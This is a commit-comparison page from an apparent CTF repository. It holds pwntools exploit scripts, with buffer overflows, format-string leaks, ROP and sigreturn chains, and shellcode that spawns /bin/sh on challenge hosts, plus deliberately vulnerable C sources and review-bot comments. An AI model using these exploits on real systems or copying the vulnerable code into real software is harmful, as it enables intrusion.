Compare commits
156 Commits
7d901b7449
..
main
| Author | SHA1 | Date | |
|---|---|---|---|
| 6402b4e2a9 | |||
| e5e052ef8b | |||
| 48d9b4ecb1 | |||
| 7779d922cf | |||
| 8a12eae871 | |||
| d8f2ba18d8 | |||
| 96683cf9ce | |||
| e582d2536a | |||
| efa1c23dbb | |||
| 15003e5606 | |||
| 7722ca5a21 | |||
| e29ebfb654 | |||
| 01d5e47459 | |||
| f1b113f802 | |||
| 3d11a08530 | |||
| 22df1755c0 | |||
| 18a146b1a5 | |||
| 5e0b579bfc | |||
| 16e21c1763 | |||
| 5a5b449511 | |||
| 2dd6d163af | |||
| 9a2edba20d | |||
| 476fe82faf | |||
| 828a4eca97 | |||
| 72f01e0427 | |||
| c0b1f1e2d3 | |||
| 831408aedf | |||
| 6dca4f2970 | |||
| c01f22eab5 | |||
| d047d4a1ef | |||
| baab6f675e | |||
| 72e17002f9 | |||
| d087cb7430 | |||
| ec2cdb7b35 | |||
| 4af1604d90 | |||
| c675b28f26 | |||
| 153fd786b8 | |||
| 40c7bc25ee | |||
| 4a2179ad71 | |||
| dbb004526e | |||
| 8009ca1f5f | |||
| e05b881fa7 | |||
| 88c88f3a62 | |||
| 483f58ba63 | |||
| b98813ca8a | |||
| 4ea52ad817 | |||
| a7ad2fc055 | |||
| 90dcd7da8b | |||
| 22ae6d18ef | |||
| 7ac3f4d224 | |||
| 2bb59fb08f | |||
| 15d9e43702 | |||
| 9032cf633c | |||
| dbfe2c981b | |||
| 02ed79a775 | |||
| a066585f12 | |||
| fcf3a9ee0f | |||
| 7f8eed4e60 | |||
| 9d44530e70 | |||
| 75d63586b3 | |||
| af72710a35 | |||
| 9bfd5552b2 | |||
| 11486f525c | |||
| fc30e1e38c | |||
| e076f1ee01 | |||
| ac8a3bc7a9 | |||
| 33e18b7b00 | |||
| 775502ff2a | |||
| a70a98afc4 | |||
| ac464ebd74 | |||
| e22305275f | |||
| f93869c059 | |||
| 0310370a2e | |||
| 7ccc26a4f6 | |||
| 37f00f4322 | |||
| 69328686b0 | |||
| 29243e6a69 | |||
| 3167ec2181 | |||
| 0dba4c91ab | |||
| a06dc4e7a8 | |||
| 464e60118d | |||
| 34260465db | |||
| de0927e6c6 | |||
| 227524ceac | |||
| 7fc17ce834 | |||
| c46956e88d | |||
| 437625403b | |||
| d8af98b051 | |||
| deab8877c6 | |||
| 534786af14 | |||
| a92eb896d1 | |||
| 6aa37b8571 | |||
| 5f56f5e7e3 | |||
| 4cc0dcab43 | |||
| e8d31313ef | |||
| 9665209a76 | |||
| f03955debc | |||
| 85d6906fae | |||
| d0c429824f | |||
| 031201a421 | |||
| 3b9dba1423 | |||
| 21b17c6f04 | |||
| 067cabe828 | |||
| 8709b54d81 | |||
| 6ad0bccc1a | |||
| 634b1ab1d5 | |||
| 5476a2e3ff | |||
| 5191989368 | |||
| 3d7dffbaa3 | |||
| a44f6a8368 | |||
| 05d7dab3fb | |||
| 10ac152ca1 | |||
| 791e7b9c99 | |||
| 5340d5e29e | |||
| 38bdf097b9 | |||
| f8e6ea66d2 | |||
| 481177cdcb | |||
| 03542d0718 | |||
| d690f93d83 | |||
| c71564b667 | |||
| 5fade1f343 | |||
| 85fea97836 | |||
| 853acb8ecf | |||
| 9f7a92d635 | |||
| 339488b990 | |||
| 083b13e139 | |||
| b4f7309082 | |||
| 62b2515039 | |||
| 609ab7d057 | |||
| 1545329292 | |||
| ab4d74d35e | |||
| d4c477f9f9 | |||
| 4f91b8d5f8 | |||
| ecb666932f | |||
| 61f2abc882 | |||
| 4ff87bf93b | |||
| 891e0d6b16 | |||
| fb603dfa60 | |||
| 92ec613644 | |||
| 3e4988716a | |||
| 7cbcd054c3 | |||
| 4153f58c73 | |||
| 2abac594dc | |||
| dfd521d190 | |||
| 33d52a6d0f | |||
| bfe1478c01 | |||
| 5534052b96 | |||
| c6c10aaf35 | |||
| 31dbf17bda | |||
| 6ccc9f60d0 | |||
| a4e1a18d3f | |||
| 815575f8a8 | |||
| 5bdccf9a91 | |||
| 9713fcda8c | |||
| db18ac85fd | |||
| a90b87e454 |
@@ -0,0 +1,16 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./floormat_sale", checksec=False)
|
||||
# r = process()
|
||||
r = remote("floormatsale.ctf.intigriti.io", 1339)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
s(b"6")
|
||||
s(b"%1c%11$n"+p64(0x40408c))
|
||||
|
||||
r.interactive()
|
||||
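Review bot: `s = lambda a: r.sendlineafter(b":", a)` binds a lambda to a name, which PEP 8 (E731) discourages because the resulting function has no useful `__name__` in tracebacks; `def s(a): return r.sendlineafter(b":", a)` reads the same, and the pattern recurs in every script in this compare. The literal `0x40408c` in the payload line is also undocumented; a comment naming what it addresses, or `target.sym.<symbol-name>` where the symbol is exported, would make the script self-describing.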
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./retro2win", checksec=False)
|
||||
# r = process()
|
||||
r = remote("retro2win.ctf.intigriti.io", 1338)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# gadgets
|
||||
pop_rdi = 0x4009b3
|
||||
pop_rsi_r15 = 0x4009b1
|
||||
|
||||
# leak
|
||||
s(b"1337")
|
||||
buf = b"A"*24
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(0x2323232323232323)
|
||||
buf += p64(pop_rsi_r15)
|
||||
buf += p64(0x4242424242424242)
|
||||
buf += p64(0)
|
||||
buf += p64(target.sym.cheat_mode)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./rigged_slot2", checksec=False)
|
||||
# r = process()
|
||||
r = remote("riggedslot2.ctf.intigriti.io", 1337)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*20
|
||||
buf += p64(1337421)
|
||||
s(buf)
|
||||
s(b"1")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,25 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.log_level = 'error'
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
for i in range(1, 100):
|
||||
r = remote("5108fea3f4263a9f.247ctf.com", 50099)
|
||||
buf = f"%{i}$s".encode()
|
||||
try:
|
||||
s(buf)
|
||||
r.recvuntil(b"back ")
|
||||
out = r.recvlineS()
|
||||
if "247CTF" in out:
|
||||
print(out)
|
||||
break
|
||||
except:
|
||||
pass
|
||||
r.close()
|
||||
|
||||
r.interactive()
|
||||
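Review bot: The bare `except:` before `pass` swallows every exception including `KeyboardInterrupt`, so Ctrl-C during the 99-connection scan is ignored and a genuine bug (a typo in the payload, a changed prompt) just looks like "not found"; narrow it to `except EOFError:`. When the loop runs to exhaustion without a match, `r.close()` has already closed the last connection and the trailing `r.interactive()` then fails on a closed tube, so that call should be conditional on a hit (a `for ... else:` clause that logs the miss and exits is the idiomatic shape). The same bare `except:` appears later in the `brute()` function of the chal script.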
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hidden_flag_function", checksec=False)
|
||||
# r = process()
|
||||
r = remote("9fe3144560d92c37.247ctf.com", 50224)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"?", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*76
|
||||
buf += p64(target.sym.flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hidden_flag_function_with_args", checksec=False)
|
||||
# r = process()
|
||||
r = remote("f3396cb78c7c71ca.247ctf.com", 50257)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*140
|
||||
buf += p32(target.sym.flag)
|
||||
buf += p32(0)
|
||||
buf += p32(0x1337)
|
||||
buf += p32(0x247)
|
||||
buf += p32(0x12345678)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,19 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
|
||||
# r = process()
|
||||
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*280
|
||||
buf += p64(target.sym.gets)
|
||||
buf += p64(target.sym.win)
|
||||
s(buf)
|
||||
s(b"flag")
|
||||
|
||||
r.interactive()
|
||||
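Review bot: `process("openssl s_client -quiet -verify_quiet -connect …:52525", shell=True)` runs a fixed command through `/bin/sh` for no benefit; pwntools' `process` takes an argv list, so `process(["openssl", "s_client", "-quiet", "-verify_quiet", "-connect", "main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525"])` drops the extra shell and any quoting surprises. Note also that `s_client` does not abort on certificate verification failure by default (`-verify_quiet` only silences the report), so the TLS hop is unauthenticated — acceptable for a CTF target, but worth a comment if this template is reused elsewhere. The second pwn-pas-ouf script repeats the same call.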
@@ -0,0 +1,41 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
|
||||
# r = process()
|
||||
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*272
|
||||
buf += p64(0x404118)
|
||||
buf += p64(0x40129e)
|
||||
buf += b"A"*280
|
||||
buf += p64(target.sym.main)
|
||||
s(buf)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b"@\n")
|
||||
puts = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("puts: %#x", puts)
|
||||
libc = puts - 0x80e50
|
||||
log.info("libc: %#x", libc)
|
||||
system = libc + 0x50d70
|
||||
sh = libc + 0x1d8678
|
||||
|
||||
# gadgets
|
||||
pop_rdi = libc + 0x2a3e5
|
||||
|
||||
# pop
|
||||
buf = b"A"*280
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(sh)
|
||||
buf += p64(pop_rdi+1)
|
||||
buf += p64(pop_rdi+1)
|
||||
buf += p64(system)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
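Review bot: The offsets `0x80e50`, `0x50d70`, `0x1d8678` and `0x2a3e5` are valid only for one specific libc build, but nothing records which one; a comment such as `# offsets from <libc build/version shipped with the challenge>` beside `libc = puts - 0x80e50` would let a reader recompute them when the target changes. Resolving `system` and the `/bin/sh` string through a loaded `ELF` object for that libc (as the later last_key script does with `libc.sym.system` and `libc.search(b"/bin/sh\0")`) would remove three of the four constants entirely.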
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./echo-app", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8008)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*264
|
||||
buf += p64(target.sym.print_flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,20 @@
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void print_flag() {
|
||||
puts(getenv("FLAG"));
|
||||
puts("^^ Flag!!111!!!! ^^");
|
||||
}
|
||||
|
||||
void do_echo() {
|
||||
uint8_t echo_buffer[256] = {0};
|
||||
gets(echo_buffer);
|
||||
puts(echo_buffer);
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
puts("ECHO! Echo! echo!");
|
||||
do_echo();
|
||||
return 0;
|
||||
}
|
||||
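Review bot: `puts(getenv("FLAG"))` passes a null pointer to `puts` when `FLAG` is not set in the environment, which is undefined behaviour and crashes on glibc; guard it with `const char *flag = getenv("FLAG"); puts(flag ? flag : "FLAG not set");`. `gets(echo_buffer)` has no bound and was removed in C11, so it should be `fgets((char *)echo_buffer, sizeof echo_buffer, stdin)` unless the unbounded read is the deliberate challenge bug, in which case a one-line comment saying so would spare the next reader the compiler-warning hunt. `puts(echo_buffer)` also passes `uint8_t *` where `const char *` is expected, which warns under `-Wall`.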
@@ -0,0 +1,28 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./echo-app2", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8009)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
buf = b"%39$p.%42$p"
|
||||
s(buf)
|
||||
leaks = r.recvS(34).split(".")
|
||||
canary = int(leaks[0], 16)
|
||||
log.info("canary: %#x", canary)
|
||||
target.address = int(leaks[1], 16)-0x15a1
|
||||
log.info("main: %#x", target.address)
|
||||
|
||||
# buf
|
||||
buf = b"A"*264
|
||||
buf += p64(canary)
|
||||
buf += p64(0)
|
||||
buf += p64(target.sym.print_flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
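Review bot: `leaks = r.recvS(34).split(".")` appears to assume the two `%p` leaks print at a fixed combined width; `%p` drops leading zeros, so a canary or PIE address with a zero high nibble is shorter, the fixed-size read then swallows part of the following output and `int(leaks[1], 16)` raises `ValueError`. Reading to the end of the line, `leaks = r.recvlineS().strip().split(".")`, removes the width dependency. The blessing script's `int(r.recv(14), 16)` carries the same fixed-width assumption.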
@@ -0,0 +1,36 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./ihnsaims", checksec=False)
|
||||
# r = process("./ihnsaims flag{fake_flag}", shell=True)
|
||||
r = remote("54.85.45.101", 8002)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"!\n", a)
|
||||
|
||||
# write
|
||||
s(b"1")
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea r12, [rdx]
|
||||
a:
|
||||
lea r12, [r12+0x1000]
|
||||
mov rdi, 1
|
||||
mov rsi, r12
|
||||
mov rdx, 0x1000
|
||||
mov rax, 1
|
||||
syscall
|
||||
cmp rax, -14
|
||||
je a
|
||||
jne b
|
||||
b:
|
||||
xor rdi, rdi
|
||||
mov rax, 231
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,24 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./only_ws", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8005)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
mov rax, 1
|
||||
mov rdi, 1
|
||||
mov rsi, 0x4040a0
|
||||
xor rdx, rdx
|
||||
add dl, 0xff
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,43 @@
|
||||
#include <seccomp.h>
|
||||
#include <syscall.h>
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/mman.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <string.h>
|
||||
|
||||
typedef void shellcode();
|
||||
char flag[64];
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
setvbuf(stdin, NULL, _IONBF, 0);
|
||||
setvbuf(stderr, NULL, _IONBF, 0);
|
||||
FILE *f = fopen("flag.txt", "r");
|
||||
if (f == NULL) {
|
||||
printf("error reading flag");
|
||||
return -1;
|
||||
}
|
||||
|
||||
fscanf(f, "%s", flag);
|
||||
printf("Flag is at 0x%x\n", (void *)flag);
|
||||
fclose(f);
|
||||
|
||||
char shellcode_buf[4096];
|
||||
int bytes_read = read(STDIN_FILENO, shellcode_buf, sizeof(shellcode_buf));
|
||||
|
||||
void *shellcode_ptr =
|
||||
mmap((void *)shellcode_buf, 1, PROT_READ | PROT_WRITE | PROT_EXEC,
|
||||
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
memcpy(shellcode_ptr, shellcode_buf, bytes_read);
|
||||
|
||||
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
|
||||
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
|
||||
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
|
||||
|
||||
seccomp_load(ctx);
|
||||
seccomp_release(ctx);
|
||||
((shellcode *)shellcode_ptr)();
|
||||
}
|
||||
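Review bot: The return values of `read` and `mmap` are never checked: `bytes_read` can be -1, which `memcpy` then receives as a huge `size_t`, and `mmap` reports failure as `MAP_FAILED` rather than NULL, so the copy would write through `(void *)-1`. Add `if (bytes_read < 0) { perror("read"); return 1; }` after the read and `if (shellcode_ptr == MAP_FAILED) { perror("mmap"); return 1; }` before the `memcpy`. `printf("Flag is at 0x%x\n", (void *)flag)` pairs `%x` with a pointer, which is undefined and truncates on 64-bit; `%p` is the correct conversion. `fscanf(f, "%s", flag)` into the 64-byte array has no width limit either; `"%63s"` bounds it.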
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./blessing", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b"this: ")
|
||||
malloced = int(r.recv(14), 16)
|
||||
log.info("malloced: %#x", malloced)
|
||||
|
||||
# buf
|
||||
r.recvuntil(b"song?")
|
||||
s(str(malloced+1).encode())
|
||||
s(b"0")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_f0r_t35t1ng}
|
||||
@@ -0,0 +1,36 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./contractor", checksec=False)
|
||||
|
||||
while True:
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a,b: r.sendafter(a, b)
|
||||
sl = lambda a,b: r.sendlineafter(a, b)
|
||||
fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
|
||||
opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
|
||||
|
||||
# leak
|
||||
fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
|
||||
r.recvuntil(b"C"*8)
|
||||
target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
|
||||
log.info("pie: %#x", target.address)
|
||||
|
||||
# write
|
||||
opt(b"4", b"A"*28+p32(0)+b"\x40")
|
||||
sl(b"> ", b"no")
|
||||
opt(b"4", p64(target.sym.contract))
|
||||
|
||||
r.recvuntil(b"lad!\n\n")
|
||||
|
||||
try:
|
||||
r.sendline(b"id")
|
||||
if r.recvline():
|
||||
break
|
||||
except EOFError:
|
||||
pass
|
||||
|
||||
r.interactive()
|
||||
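Review bot: In `fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]` the test `b"\n" in a` is a list-membership check on `a` (is some element equal to `b"\n"`), not a substring test on the item, so it is always false here and the `sl` branch is dead; the intent reads as `if b"\n" in i`, and the script works only because the items carry their own newline. Since the process is re-spawned inside `while True`, the `except EOFError: pass` path should also call `r.close()` so failed attempts do not accumulate child processes for the life of the script.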
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_f0r_t35t1ng}
|
||||
@@ -0,0 +1,37 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./crossbow", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
ss = lambda a: r.sendlineafter(b"> ", a)
|
||||
|
||||
# gadgets
|
||||
pop_rax = 0x401001
|
||||
pop_rdi = 0x401d6c
|
||||
pop_rsi = 0x40566b
|
||||
pop_rdx = 0x401139
|
||||
syscall = 0x4015d3
|
||||
mov_rax_rdi = 0x4020f5
|
||||
|
||||
# buf
|
||||
buf = b"JUNK"*2
|
||||
buf += p64(pop_rax)
|
||||
buf += b"/bin/sh\0"
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(0x40d500)
|
||||
buf += p64(mov_rax_rdi)
|
||||
buf += p64(pop_rax)
|
||||
buf += p64(59)
|
||||
buf += p64(pop_rsi)
|
||||
buf += p64(0)
|
||||
buf += p64(pop_rdx)
|
||||
buf += p64(0)
|
||||
buf += p64(syscall)
|
||||
s(b"-2")
|
||||
ss(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./laconic", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# gadgets
|
||||
pop_rax = 0x43018
|
||||
syscall = 0x43015
|
||||
|
||||
# sigframe
|
||||
frame = SigreturnFrame()
|
||||
frame.rax = 0
|
||||
frame.rdi = 0
|
||||
frame.rsi = 0x43005
|
||||
frame.rdx = 0xff
|
||||
frame.rip = syscall
|
||||
|
||||
# buf
|
||||
buf = b"A"*8
|
||||
buf += p64(pop_rax)
|
||||
buf += p64(0xf)
|
||||
buf += p64(syscall)
|
||||
buf += bytes(frame)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rdi, [rsi+32]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov al, 59
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"/bin/sh\0"
|
||||
buf += sc
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./quack_quack", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"> ", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*89
|
||||
buf += b"Quack Quack "
|
||||
buf += b"B"
|
||||
s(buf)
|
||||
r.recvuntil(b"Quack Quack ")
|
||||
canary = u64(r.recv(7).rjust(8, b"\x00"))
|
||||
log.info("canary: %#x", canary)
|
||||
|
||||
# buf
|
||||
buf = b"A"*88
|
||||
buf += p64(canary)
|
||||
buf += b"JUNK"*2
|
||||
buf += p64(target.sym.duck_attack)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_4_t35t1ng}
|
||||
@@ -0,0 +1,48 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
from ctypes import CDLL
|
||||
|
||||
context.binary = target = ELF("./last_key", checksec=False)
|
||||
libc = target.libc
|
||||
lib = CDLL("./glibc/libc.so.6")
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# nums
|
||||
lib.srand(lib.time(0))
|
||||
first_rand = (lib.rand() % 5) + 1
|
||||
second_rand = (lib.rand() % 10) + 10
|
||||
diff = second_rand - first_rand
|
||||
|
||||
# buf
|
||||
for _ in range(diff):
|
||||
s(b"R")
|
||||
|
||||
# gadgets
|
||||
pop_rdi = lambda a: p64(0x40178d) + p64(a)
|
||||
|
||||
# leak
|
||||
buf = b"A"*24
|
||||
buf += pop_rdi(target.got.puts)
|
||||
buf += p64(target.sym.puts)
|
||||
buf += p64(target.sym.set_score)
|
||||
s(buf)
|
||||
r.recvuntil(b"prize..\n\n")
|
||||
puts = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("puts: %#x", puts)
|
||||
libc.address = puts - libc.sym.puts
|
||||
log.info("libc: %#x", libc.address)
|
||||
system = libc.sym.system
|
||||
sh = next(libc.search(b"/bin/sh\0"))
|
||||
|
||||
# pop
|
||||
buf = b"A"*25
|
||||
buf += pop_rdi(sh)
|
||||
buf += p64(0x40178e)
|
||||
buf += p64(system)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
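Review bot: `lib.time(0)` is called through ctypes without setting `lib.time.restype`, so the `time_t` result is truncated to a C `int`; that happens to give the right seed until 2038, but it is an accident rather than a contract, and the line below seeds `lib.srand` with whatever came back. Setting `lib.time.restype = c_long` next to the `CDLL` line (importing `c_long` alongside `CDLL`) makes the intent explicit. Because the seed is wall-clock seconds, a run that crosses a second boundary between the target's own `srand` and this script's `lib.time(0)` also mismatches; a short comment noting that a failed first exchange simply means "rerun" would save the next user a debugging session.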
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./riddle", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b">> ", a)
|
||||
ss = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
s(b"1")
|
||||
ss(b"2147483647")
|
||||
ss(b"1")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./challenge", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 5050)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"> ", a)
|
||||
ss = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
s(b"12")
|
||||
ss(b"flag.txt\0")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./flow", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 7001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*60
|
||||
buf += p32(0x34333231)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./heap_wars", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1337)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
s(b"1")
|
||||
buf = b"A"*80
|
||||
buf += p64(target.sym.theForce)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,32 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1244)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
buf = b"%7$p"
|
||||
s(buf)
|
||||
r.recvuntil(b"tune : ")
|
||||
heap = int(r.recvline().strip(), 16) + 0x850
|
||||
log.info("heap: %#x", heap)
|
||||
|
||||
# sc
|
||||
sc = """
|
||||
lea rdi, [rdx+19]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 59
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"/bin/sh\0"
|
||||
sc += b"A"*(32-len(sc))
|
||||
sc += p64(heap)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,20 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./nihil", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 7002)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"?", a)
|
||||
|
||||
# buf
|
||||
s(b"a")
|
||||
buf = b"A"*16
|
||||
buf += p64(0)
|
||||
buf += b"JUNK"
|
||||
buf += p32(727)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./challenge", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1243)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
inc = lambda: r.sendline(b"2")
|
||||
|
||||
# read
|
||||
for i in range(3): s(b"3")
|
||||
s(b"5")
|
||||
s(b"6") # 48
|
||||
inc()
|
||||
s(b"4")
|
||||
s(b"3")
|
||||
s(b"5") # 89
|
||||
inc()
|
||||
